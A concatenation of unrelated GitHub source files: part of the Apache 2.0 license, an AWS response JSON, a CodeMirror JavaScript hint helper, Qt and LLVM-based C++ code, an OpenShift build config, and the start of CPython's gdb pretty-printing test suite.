editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
|
{
"pile_set_name": "Github"
}
|
{
"status_code": 200,
"data": {
"FailedEntries": [],
"ResponseMetadata": {
"HTTPStatusCode": 200,
"RequestId": "66f128aa-6a74-11e6-b1df-6905c3c8daa6",
"HTTPHeaders": {
"x-amzn-requestid": "66f128aa-6a74-11e6-b1df-6905c3c8daa6",
"date": "Thu, 25 Aug 2016 03:31:25 GMT",
"content-length": "41",
"content-type": "application/x-amz-json-1.1"
}
},
"FailedEntryCount": 0
}
}
|
{
"pile_set_name": "Github"
}
|
(function () {
function forEach(arr, f) {
for (var i = 0, e = arr.length; i < e; ++i) f(arr[i]);
}
function arrayContains(arr, item) {
if (!Array.prototype.indexOf) {
var i = arr.length;
while (i--) {
if (arr[i] === item) {
return true;
}
}
return false;
}
return arr.indexOf(item) != -1;
}
function scriptHint(editor, keywords, getToken) {
// Find the token at the cursor
var cur = editor.getCursor(), token = getToken(editor, cur), tprop = token;
// If it's not a 'word-style' token, ignore the token.
if (!/^[\w$_]*$/.test(token.string)) {
token = tprop = {start: cur.ch, end: cur.ch, string: "", state: token.state,
className: token.string == "." ? "property" : null};
}
// If it is a property, find out what it is a property of.
while (tprop.className == "property") {
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
if (tprop.string != ".") return;
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
if (tprop.string == ')') {
var level = 1;
do {
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
switch (tprop.string) {
case ')': level++; break;
case '(': level--; break;
default: break;
}
} while (level > 0)
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
if (tprop.className == 'variable')
tprop.className = 'function';
else return; // no clue
}
if (!context) var context = [];
context.push(tprop);
}
return {list: getCompletions(token, context, keywords),
from: {line: cur.line, ch: token.start},
to: {line: cur.line, ch: token.end}};
}
CodeMirror.javascriptHint = function(editor) {
return scriptHint(editor, javascriptKeywords,
function (e, cur) {return e.getTokenAt(cur);});
}
function getCoffeeScriptToken(editor, cur) {
// This getToken, it is for coffeescript, imitates the behavior of
// getTokenAt method in javascript.js, that is, returning "property"
// type and treat "." as indepenent token.
var token = editor.getTokenAt(cur);
if (cur.ch == token.start + 1 && token.string.charAt(0) == '.') {
token.end = token.start;
token.string = '.';
token.className = "property";
}
else if (/^\.[\w$_]*$/.test(token.string)) {
token.className = "property";
token.start++;
token.string = token.string.replace(/\./, '');
}
return token;
}
CodeMirror.coffeescriptHint = function(editor) {
return scriptHint(editor, coffeescriptKeywords, getCoffeeScriptToken);
}
var stringProps = ("charAt charCodeAt indexOf lastIndexOf substring substr slice trim trimLeft trimRight " +
"toUpperCase toLowerCase split concat match replace search").split(" ");
var arrayProps = ("length concat join splice push pop shift unshift slice reverse sort indexOf " +
"lastIndexOf every some filter forEach map reduce reduceRight ").split(" ");
var funcProps = "prototype apply call bind".split(" ");
var javascriptKeywords = ("break case catch continue debugger default delete do else false finally for function " +
"if in instanceof new null return switch throw true try typeof var void while with").split(" ");
var coffeescriptKeywords = ("and break catch class continue delete do else extends false finally for " +
"if in instanceof isnt new no not null of off on or return switch then throw true try typeof until void while with yes").split(" ");
function getCompletions(token, context, keywords) {
var found = [], start = token.string;
function maybeAdd(str) {
if (str.indexOf(start) == 0 && !arrayContains(found, str)) found.push(str);
}
function gatherCompletions(obj) {
if (typeof obj == "string") forEach(stringProps, maybeAdd);
else if (obj instanceof Array) forEach(arrayProps, maybeAdd);
else if (obj instanceof Function) forEach(funcProps, maybeAdd);
for (var name in obj) maybeAdd(name);
}
if (context) {
// If this is a property, see if it belongs to some object we can
// find in the current environment.
var obj = context.pop(), base;
if (obj.className == "variable")
base = window[obj.string];
else if (obj.className == "string")
base = "";
else if (obj.className == "atom")
base = 1;
else if (obj.className == "function") {
if (window.jQuery != null && (obj.string == '$' || obj.string == 'jQuery') &&
(typeof window.jQuery == 'function'))
base = window.jQuery();
else if (window._ != null && (obj.string == '_') && (typeof window._ == 'function'))
base = window._();
}
while (base != null && context.length)
base = base[context.pop().string];
if (base != null) gatherCompletions(base);
}
else {
// If not, just look in the window object and any local scope
// (reading into JS mode internals to get at the local variables)
for (var v = token.state.localVars; v; v = v.next) maybeAdd(v.name);
gatherCompletions(window);
forEach(keywords, maybeAdd);
}
return found;
}
})();
|
{
"pile_set_name": "Github"
}
|
#include "ShaderView.h"
#include "ShaderEditor.h"
#include "ShaderTemplateDataModel.h"
#include "nodeeditor/internal/node/Node.hpp"
#include <QMenu>
#include <QWidgetAction>
#include <QTreeWidget>
#include <QContextMenuEvent>
#include <nodeeditor/FlowScene>
#include "engine/core/log/Log.h"
namespace DataFlowProgramming
{
ShaderView::ShaderView(QWidget* parent)
: FlowView(parent)
{
}
ShaderView::ShaderView(QtNodes::FlowScene* scene, QWidget* parent)
: FlowView(scene, parent)
{
}
ShaderView::~ShaderView()
{
}
void ShaderView::contextMenuEvent(QContextMenuEvent* event)
{
if (itemAt(event->pos()))
{
QGraphicsView::contextMenuEvent(event);
return;
}
QMenu modelMenu;
auto skipText = QStringLiteral("skip me");
//Add filterbox to the context menu
auto* txtBox = new QLineEdit(&modelMenu);
txtBox->setPlaceholderText(QStringLiteral("Filter"));
txtBox->setClearButtonEnabled(true);
auto* txtBoxAction = new QWidgetAction(&modelMenu);
txtBoxAction->setDefaultWidget(txtBox);
modelMenu.addAction(txtBoxAction);
//Add result treeview to the context menu
auto* treeView = new QTreeWidget(&modelMenu);
treeView->header()->close();
auto* treeViewAction = new QWidgetAction(&modelMenu);
treeViewAction->setDefaultWidget(treeView);
modelMenu.addAction(treeViewAction);
QMap<QString, QTreeWidgetItem*> topLevelItems;
for (auto const& cat : _scene->registry().categories())
{
if (cat != skipText)
{
auto item = new QTreeWidgetItem(treeView);
item->setText(0, cat);
item->setData(0, Qt::UserRole, skipText);
topLevelItems[cat] = item;
}
}
for (auto const& assoc : _scene->registry().registeredModelsCategoryAssociation())
{
auto parent = topLevelItems[assoc.second];
if (parent)
{
auto item = new QTreeWidgetItem(parent);
item->setText(0, assoc.first);
item->setData(0, Qt::UserRole, assoc.first);
}
}
treeView->expandAll();
connect(treeView, &QTreeWidget::itemClicked, [&](QTreeWidgetItem* item, int)
{
QString modelName = item->data(0, Qt::UserRole).toString();
if (modelName == skipText)
{
return;
}
auto type = _scene->registry().create(modelName);
if (type)
{
auto& node = _scene->createNode(std::move(type));
QPoint pos = event->pos();
QPointF posView = this->mapToScene(pos);
node.nodeGraphicsObject().setPos(posView);
_scene->nodePlaced(node);
}
else
{
EchoLogError("Model not found");
}
modelMenu.close();
});
//Setup filtering
connect(txtBox, &QLineEdit::textChanged, [&](const QString& text)
{
for (auto& topLvlItem : topLevelItems)
{
if (topLvlItem)
{
for (int i = 0; i < topLvlItem->childCount(); ++i)
{
auto child = topLvlItem->child(i);
auto modelName = child->data(0, Qt::UserRole).toString();
const bool match = (modelName.contains(text, Qt::CaseInsensitive));
child->setHidden(!match);
}
}
}
});
// make sure the text box gets focus so the user doesn't have to click on it
txtBox->setFocus();
modelMenu.exec(event->globalPos());
}
}
|
{
"pile_set_name": "Github"
}
|
/*===================== begin_copyright_notice ==================================
Copyright (c) 2017 Intel Corporation
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
======================= end_copyright_notice ==================================*/
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
///////////////////////////////////////////////////////////////////////////////
// This file is based on llvm-3.4\lib\CodeGen\LexicalScopes.cpp
///////////////////////////////////////////////////////////////////////////////
#include "llvm/Config/llvm-config.h"
#include "common/LLVMWarningsPush.hpp"
#include "llvm/ADT/STLExtras.h"
#include "llvm/IR/DebugInfo.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/Metadata.h"
#include "llvm/Support/Debug.h"
#include "llvm/Support/FormattedStream.h"
#include "llvm/IR/Module.h"
#include "common/LLVMWarningsPop.hpp"
#include "LexicalScopes.hpp"
#include "VISAModule.hpp"
#include "Probe/Assertion.h"
#define DEBUG_TYPE "lexicalscopes"
using namespace llvm;
using namespace IGC;
LexicalScopes::~LexicalScopes()
{
releaseMemory();
}
/// releaseMemory - release memory.
void LexicalScopes::releaseMemory()
{
VisaM = NULL;
CurrentFnLexicalScope = nullptr;
LexicalScopeMap.clear();
AbstractScopeMap.clear();
InlinedLexicalScopeMap.clear();
AbstractScopesList.clear();
}
/// initialize - Scan machine function and constuct lexical scope nest.
void LexicalScopes::initialize(const IGC::VISAModule* M)
{
releaseMemory();
VisaM = M;
SmallVector<InsnRange, 4> MIRanges;
DenseMap<const Instruction*, LexicalScope*> MI2ScopeMap;
extractLexicalScopes(MIRanges, MI2ScopeMap);
if (CurrentFnLexicalScope)
{
constructScopeNest(CurrentFnLexicalScope);
assignInstructionRanges(MIRanges, MI2ScopeMap);
}
}
/// extractLexicalScopes - Extract instruction ranges for each lexical scopes
/// for the given machine function.
void LexicalScopes::
extractLexicalScopes(SmallVectorImpl<InsnRange>& MIRanges,
DenseMap<const Instruction*, LexicalScope*>& MI2ScopeMap)
{
// Scan each instruction and create scopes. First build working set of scopes.
const Instruction* RangeBeginMI = nullptr;
const Instruction* PrevMI = nullptr;
const DILocation* PrevDL = nullptr;
for (IGC::VISAModule::const_iterator II = VisaM->begin(), IE = VisaM->end();
II != IE; ++II)
{
const Instruction* MInsn = *II;
// Check if instruction has valid location information.
const DILocation* MIDL = MInsn->getDebugLoc();
if (!MIDL)
{
PrevMI = MInsn;
continue;
}
// If scope has not changed then skip this instruction.
if (MIDL == PrevDL)
{
PrevMI = MInsn;
continue;
}
// Ignore DBG_VALUE. It does not contribute to any instruction in output.
//if (VisaM->IsDebugValue(MInsn))
//continue;
if (RangeBeginMI)
{
// If we have already seen a beginning of an instruction range and
// current instruction scope does not match scope of first instruction
// in this range then create a new instruction range.
InsnRange R(RangeBeginMI, PrevMI);
MI2ScopeMap[RangeBeginMI] = getOrCreateLexicalScope(PrevDL);
MIRanges.push_back(R);
}
// This is a beginning of a new instruction range.
RangeBeginMI = MInsn;
// Reset previous markers.
PrevMI = MInsn;
PrevDL = MIDL;
}
// Create last instruction range.
if (RangeBeginMI && PrevMI && PrevDL)
{
InsnRange R(RangeBeginMI, PrevMI);
MIRanges.push_back(R);
MI2ScopeMap[RangeBeginMI] = getOrCreateLexicalScope(PrevDL);
}
}
/// findLexicalScope - Find lexical scope, either regular or inlined, for the
/// given DebugLoc. Return NULL if not found.
LexicalScope* LexicalScopes::findLexicalScope(const DILocation* DL)
{
DILocalScope* Scope = DL->getScope();
if (!Scope)
return nullptr;
// The scope that we were created with could have an extra file - which
// isn't what we care about in this case.
if (auto* File = dyn_cast<DILexicalBlockFile>(Scope))
Scope = File->getScope();
if (auto* IA = DL->getInlinedAt()) {
auto I = InlinedLexicalScopeMap.find(std::make_pair(Scope, IA));
return I != InlinedLexicalScopeMap.end() ? &I->second : nullptr;
}
return findLexicalScope(Scope);
}
/// getOrCreateLexicalScope - Find lexical scope for the given DebugLoc. If
/// not available then create new lexical scope.
LexicalScope* LexicalScopes::getOrCreateLexicalScope(const DILocalScope* Scope,
const DILocation* IA) {
if (IA) {
// Create an abstract scope for inlined function.
getOrCreateAbstractScope(Scope);
// Create an inlined scope for inlined function.
return getOrCreateInlinedScope(Scope, IA);
}
return getOrCreateRegularScope(Scope);
}
/// getOrCreateRegularScope - Find or create a regular lexical scope.
LexicalScope*
LexicalScopes::getOrCreateRegularScope(const DILocalScope* Scope) {
Scope = Scope->getNonLexicalBlockFileScope();
auto I = LexicalScopeMap.find(Scope);
if (I != LexicalScopeMap.end())
return &I->second;
// FIXME: Should the following dyn_cast be DILexicalBlock?
LexicalScope* Parent = nullptr;
if (auto* Block = dyn_cast<DILexicalBlockBase>(Scope))
Parent = getOrCreateLexicalScope(Block->getScope());
I = LexicalScopeMap.emplace(std::piecewise_construct,
std::forward_as_tuple(Scope),
std::forward_as_tuple(Parent, Scope, nullptr,
false)).first;
if (!Parent) {
//IGC_ASSERT(cast<DISubprogram>(Scope)->describes(VisaM->GetEntryFunction()));
//IGC_ASSERT(!CurrentFnLexicalScope);
CurrentFnLexicalScope = &I->second;
}
return &I->second;
}
/// getOrCreateInlinedScope - Find or create an inlined lexical scope.
LexicalScope*
LexicalScopes::getOrCreateInlinedScope(const DILocalScope* Scope,
const DILocation* InlinedAt) {
Scope = Scope->getNonLexicalBlockFileScope();
std::pair<const DILocalScope*, const DILocation*> P(Scope, InlinedAt);
auto I = InlinedLexicalScopeMap.find(P);
if (I != InlinedLexicalScopeMap.end())
return &I->second;
LexicalScope* Parent;
if (auto* Block = dyn_cast<DILexicalBlockBase>(Scope))
Parent = getOrCreateInlinedScope(Block->getScope(), InlinedAt);
else
Parent = getOrCreateLexicalScope(InlinedAt);
I = InlinedLexicalScopeMap.emplace(std::piecewise_construct,
std::forward_as_tuple(P),
std::forward_as_tuple(Parent, Scope,
InlinedAt, false))
.first;
return &I->second;
}
/// getOrCreateAbstractScope - Find or create an abstract lexical scope.
LexicalScope*
LexicalScopes::getOrCreateAbstractScope(const DILocalScope* Scope) {
IGC_ASSERT_MESSAGE(Scope, "Invalid Scope encoding!");
Scope = Scope->getNonLexicalBlockFileScope();
auto I = AbstractScopeMap.find(Scope);
if (I != AbstractScopeMap.end())
return &I->second;
// FIXME: Should the following isa be DILexicalBlock?
LexicalScope* Parent = nullptr;
if (auto* Block = dyn_cast<DILexicalBlockBase>(Scope))
Parent = getOrCreateAbstractScope(Block->getScope());
I = AbstractScopeMap.emplace(std::piecewise_construct,
std::forward_as_tuple(Scope),
std::forward_as_tuple(Parent, Scope,
nullptr, true)).first;
if (isa<DISubprogram>(Scope))
AbstractScopesList.push_back(&I->second);
return &I->second;
}
/// constructScopeNest
void LexicalScopes::constructScopeNest(LexicalScope* Scope) {
IGC_ASSERT_MESSAGE(Scope, "Unable to calculate scope dominance graph!");
SmallVector<LexicalScope*, 4> WorkStack;
WorkStack.push_back(Scope);
unsigned Counter = 0;
while (!WorkStack.empty()) {
LexicalScope* WS = WorkStack.back();
const SmallVectorImpl<LexicalScope*>& Children = WS->getChildren();
bool visitedChildren = false;
for (SmallVectorImpl<LexicalScope*>::const_iterator SI = Children.begin(),
SE = Children.end();
SI != SE; ++SI) {
LexicalScope* ChildScope = *SI;
if (!ChildScope->getDFSOut()) {
WorkStack.push_back(ChildScope);
visitedChildren = true;
ChildScope->setDFSIn(++Counter);
break;
}
}
if (!visitedChildren) {
WorkStack.pop_back();
WS->setDFSOut(++Counter);
}
}
}
/// assignInstructionRanges - Find ranges of instructions covered by each
/// lexical scope.
void LexicalScopes::
assignInstructionRanges(SmallVectorImpl<InsnRange>& MIRanges,
DenseMap<const Instruction*, LexicalScope*>& MI2ScopeMap)
{
LexicalScope* PrevLexicalScope = NULL;
for (SmallVectorImpl<InsnRange>::const_iterator RI = MIRanges.begin(),
RE = MIRanges.end(); RI != RE; ++RI)
{
const InsnRange& R = *RI;
LexicalScope* S = MI2ScopeMap.lookup(R.first);
IGC_ASSERT_MESSAGE(S, "Lost LexicalScope for a machine instruction!");
if (PrevLexicalScope && !PrevLexicalScope->dominates(S))
PrevLexicalScope->closeInsnRange(S);
S->openInsnRange(R.first);
S->extendInsnRange(R.second);
PrevLexicalScope = S;
}
if (PrevLexicalScope)
PrevLexicalScope->closeInsnRange();
}
/// dump - Print data structures.
void LexicalScope::dump(unsigned Indent) const
{
#ifndef NDEBUG
raw_ostream& err = dbgs();
err.indent(Indent);
err << "DFSIn: " << DFSIn << " DFSOut: " << DFSOut << "\n";
const MDNode* N = Desc;
err.indent(Indent);
N->dump();
if (AbstractScope)
err << std::string(Indent, ' ') << "Abstract Scope\n";
if (!Children.empty())
err << std::string(Indent + 2, ' ') << "Children ...\n";
for (unsigned i = 0, e = Children.size(); i != e; ++i)
{
if (Children[i] != this)
Children[i]->dump(Indent + 2);
}
#endif
}
|
{
"pile_set_name": "Github"
}
|
kind: ImageStream
apiVersion: image.openshift.io/v1
metadata:
name: "openscap-ocp4-ds"
spec:
lookupPolicy:
local: true
---
kind: BuildConfig
apiVersion: build.openshift.io/v1
metadata:
name: "openscap-ocp4-ds"
spec:
runPolicy: "Serial"
triggers:
-
type: "ImageChange"
source:
dockerfile: |
FROM registry.access.redhat.com/ubi8/ubi-minimal
WORKDIR /
COPY ssg-ocp4-ds.xml .
COPY ssg-rhel7-ds.xml .
COPY ssg-rhcos4-ds.xml .
strategy:
dockerStrategy:
noCache: true
output:
to:
kind: "ImageStreamTag"
name: "openscap-ocp4-ds:latest"
|
{
"pile_set_name": "Github"
}
|
# Verify that gdb can pretty-print the various PyObject* types
#
# The code for testing gdb was adapted from similar work in Unladen Swallow's
# Lib/test/test_jit_gdb.py
import os
import re
import pprint
import subprocess
import sys
import sysconfig
import unittest
import locale
# Is this Python configured to support threads?
try:
import _thread
except ImportError:
_thread = None
from test import support
from test.support import run_unittest, findfile, python_is_optimized
def get_gdb_version():
try:
proc = subprocess.Popen(["gdb", "-nx", "--version"],
stdout=subprocess.PIPE,
universal_newlines=True)
with proc:
version = proc.communicate()[0]
except OSError:
# This is what "no gdb" looks like. There may, however, be other
# errors that manifest this way too.
raise unittest.SkipTest("Couldn't find gdb on the path")
# Regex to parse:
# 'GNU gdb (GDB; SUSE Linux Enterprise 12) 7.7\n' -> 7.7
# 'GNU gdb (GDB) Fedora 7.9.1-17.fc22\n' -> 7.9
# 'GNU gdb 6.1.1 [FreeBSD]\n' -> 6.1
# 'GNU gdb (GDB) Fedora (7.5.1-37.fc18)\n' -> 7.5
match = re.search(r"^GNU gdb.*?\b(\d+)\.(\d+)", version)
if match is None:
raise Exception("unable to parse GDB version: %r" % version)
return (version, int(match.group(1)), int(match.group(2)))
gdb_version, gdb_major_version, gdb_minor_version = get_gdb_version()
if gdb_major_version < 7:
raise unittest.SkipTest("gdb versions before 7.0 didn't support python "
"embedding. Saw %s.%s:\n%s"
% (gdb_major_version, gdb_minor_version,
gdb_version))
if not sysconfig.is_python_build():
raise unittest.SkipTest("test_gdb only works on source builds at the moment.")
# Location of custom hooks file in a repository checkout.
checkout_hook_path = os.path.join(os.path.dirname(sys.executable),
'python-gdb.py')
PYTHONHASHSEED = '123'
def run_gdb(*args, **env_vars):
"""Runs gdb in --batch mode with the additional arguments given by *args.
Returns its (stdout, stderr) decoded from utf-8 using the replace handler.
"""
if env_vars:
env = os.environ.copy()
env.update(env_vars)
else:
env = None
# -nx: Do not execute commands from any .gdbinit initialization files
# (issue #22188)
base_cmd = ('gdb', '--batch', '-nx')
if (gdb_major_version, gdb_minor_version) >= (7, 4):
base_cmd += ('-iex', 'add-auto-load-safe-path ' + checkout_hook_path)
proc = subprocess.Popen(base_cmd + args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
with proc:
out, err = proc.communicate()
return out.decode('utf-8', 'replace'), err.decode('utf-8', 'replace')
# Verify that "gdb" was built with the embedded python support enabled:
gdbpy_version, _ = run_gdb("--eval-command=python import sys; print(sys.version_info)")
if not gdbpy_version:
raise unittest.SkipTest("gdb not built with embedded python support")
# Verify that "gdb" can load our custom hooks, as OS security settings may
# disallow this without a customised .gdbinit.
cmd = ['--args', sys.executable]
_, gdbpy_errors = run_gdb('--args', sys.executable)
if "auto-loading has been declined" in gdbpy_errors:
msg = "gdb security settings prevent use of custom hooks: "
raise unittest.SkipTest(msg + gdbpy_errors.rstrip())
def gdb_has_frame_select():
# Does this build of gdb have gdb.Frame.select ?
stdout, _ = run_gdb("--eval-command=python print(dir(gdb.Frame))")
m = re.match(r'.*\[(.*)\].*', stdout)
if not m:
raise unittest.SkipTest("Unable to parse output from gdb.Frame.select test")
gdb_frame_dir = m.group(1).split(', ')
return "'select'" in gdb_frame_dir
HAS_PYUP_PYDOWN = gdb_has_frame_select()
BREAKPOINT_FN='builtin_id'
class DebuggerTests(unittest.TestCase):
"""Test that the debugger can debug Python."""
def get_stack_trace(self, source=None, script=None,
breakpoint=BREAKPOINT_FN,
cmds_after_breakpoint=None,
import_site=False):
'''
Run 'python -c SOURCE' under gdb with a breakpoint.
Support injecting commands after the breakpoint is reached
Returns the stdout from gdb
cmds_after_breakpoint: if provided, a list of strings: gdb commands
'''
# We use "set breakpoint pending yes" to avoid blocking with a:
# Function "foo" not defined.
# Make breakpoint pending on future shared library load? (y or [n])
# error, which typically happens python is dynamically linked (the
# breakpoints of interest are to be found in the shared library)
# When this happens, we still get:
# Function "textiowrapper_write" not defined.
# emitted to stderr each time, alas.
# Initially I had "--eval-command=continue" here, but removed it to
# avoid repeated print breakpoints when traversing hierarchical data
# structures
# Generate a list of commands in gdb's language:
commands = ['set breakpoint pending yes',
'break %s' % breakpoint,
# The tests assume that the first frame of printed
# backtrace will not contain program counter,
# that is however not guaranteed by gdb
# therefore we need to use 'set print address off' to
# make sure the counter is not there. For example:
# #0 in PyObject_Print ...
# is assumed, but sometimes this can be e.g.
# #0 0x00003fffb7dd1798 in PyObject_Print ...
'set print address off',
'run']
# GDB as of 7.4 onwards can distinguish between the
# value of a variable at entry vs current value:
# http://sourceware.org/gdb/onlinedocs/gdb/Variables.html
# which leads to the selftests failing with errors like this:
# AssertionError: 'v@entry=()' != '()'
# Disable this:
if (gdb_major_version, gdb_minor_version) >= (7, 4):
commands += ['set print entry-values no']
if cmds_after_breakpoint:
commands += cmds_after_breakpoint
else:
commands += ['backtrace']
# print commands
# Use "commands" to generate the arguments with which to invoke "gdb":
args = ["gdb", "--batch", "-nx"]
args += ['--eval-command=%s' % cmd for cmd in commands]
args += ["--args",
sys.executable]
if not import_site:
# -S suppresses the default 'import site'
args += ["-S"]
if source:
args += ["-c", source]
elif script:
args += [script]
# print args
# print (' '.join(args))
# Use "args" to invoke gdb, capturing stdout, stderr:
out, err = run_gdb(*args, PYTHONHASHSEED=PYTHONHASHSEED)
errlines = err.splitlines()
unexpected_errlines = []
# Ignore some benign messages on stderr.
ignore_patterns = (
'Function "%s" not defined.' % breakpoint,
"warning: no loadable sections found in added symbol-file"
" system-supplied DSO",
"warning: Unable to find libthread_db matching"
" inferior's thread library, thread debugging will"
" not be available.",
"warning: Cannot initialize thread debugging"
" library: Debugger service failed",
'warning: Could not load shared library symbols for '
'linux-vdso.so',
'warning: Could not load shared library symbols for '
'linux-gate.so',
'warning: Could not load shared library symbols for '
'linux-vdso64.so',
'Do you need "set solib-search-path" or '
'"set sysroot"?',
'warning: Source file is more recent than executable.',
# Issue #19753: missing symbols on System Z
'Missing separate debuginfo for ',
'Try: zypper install -C ',
)
for line in errlines:
if not line.startswith(ignore_patterns):
unexpected_errlines.append(line)
# Ensure no unexpected error messages:
self.assertEqual(unexpected_errlines, [])
return out
def get_gdb_repr(self, source,
cmds_after_breakpoint=None,
import_site=False):
# Given an input python source representation of data,
# run "python -c'id(DATA)'" under gdb with a breakpoint on
# builtin_id and scrape out gdb's representation of the "op"
# parameter, and verify that the gdb displays the same string
#
# Verify that the gdb displays the expected string
#
# For a nested structure, the first time we hit the breakpoint will
# give us the top-level structure
# NOTE: avoid decoding too much of the traceback as some
# undecodable characters may lurk there in optimized mode
# (issue #19743).
cmds_after_breakpoint = cmds_after_breakpoint or ["backtrace 1"]
gdb_output = self.get_stack_trace(source, breakpoint=BREAKPOINT_FN,
cmds_after_breakpoint=cmds_after_breakpoint,
import_site=import_site)
# gdb can insert additional '\n' and space characters in various places
